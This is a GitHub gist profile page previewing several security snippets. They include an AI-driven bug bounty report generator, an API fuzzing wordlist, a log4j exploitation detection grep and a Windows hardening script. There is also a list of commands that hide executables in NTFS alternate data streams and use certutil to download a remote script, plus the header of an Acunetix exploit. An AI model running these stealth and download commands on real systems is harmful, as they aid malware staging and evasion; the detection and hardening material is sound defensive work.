Skip to content

Instantly share code, notes, and snippets.

View oakkaya's full-sized avatar
🪁
Entertaiment Never End

Oğuzhan Akkaya oakkaya

🪁
Entertaiment Never End
39 followers · 183 following
View GitHub Profile
@oakkaya
oakkaya / report.py
Created June 3, 2023 09:04 — forked from Huntinex/report.py
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
@oakkaya
oakkaya / List of API endpoints & objects
Created May 23, 2023 17:08 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@oakkaya
oakkaya / log4j_rce_detection.md
Created December 11, 2021 00:53 — forked from Neo23x0/log4j_rce_detection.md
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
@oakkaya
oakkaya / windows_hardening.cmd
Created October 26, 2021 13:12 — forked from api0cradle/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@oakkaya
oakkaya / Exe_ADS_Methods.md
Created October 26, 2021 12:22 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@oakkaya
oakkaya / keybase.md
Created August 30, 2016 12:38

Keybase proof

I hereby claim:

  • I am oakkaya on github.
  • I am oakkaya (https://keybase.io/oakkaya) on keybase.
  • I have a public key ASD9Ka-TEHs7JWWNYEGs142dyXNrI0J3JmxNrXyvwmrzpAo

To claim this, I am signing this object:

@oakkaya
oakkaya / Acunetix8.py
Created June 9, 2014 00:41
#!/usr/bin/python
# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
# Version: 8
# Build: 20120704
# Tested on: Windows XP SP2 en //Shellcode working on Xp and Linux x86 and x64,not working w7 or w8.You'll use different buf with head + junk mechanism to w7 or w8 system !
# Vendor: http://www.acunetix.com/
# Exploit Rebuild: Oğuzhan Akkaya.
# @Smashthekernel
# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# /!\ Author is not responsible for any damage you cause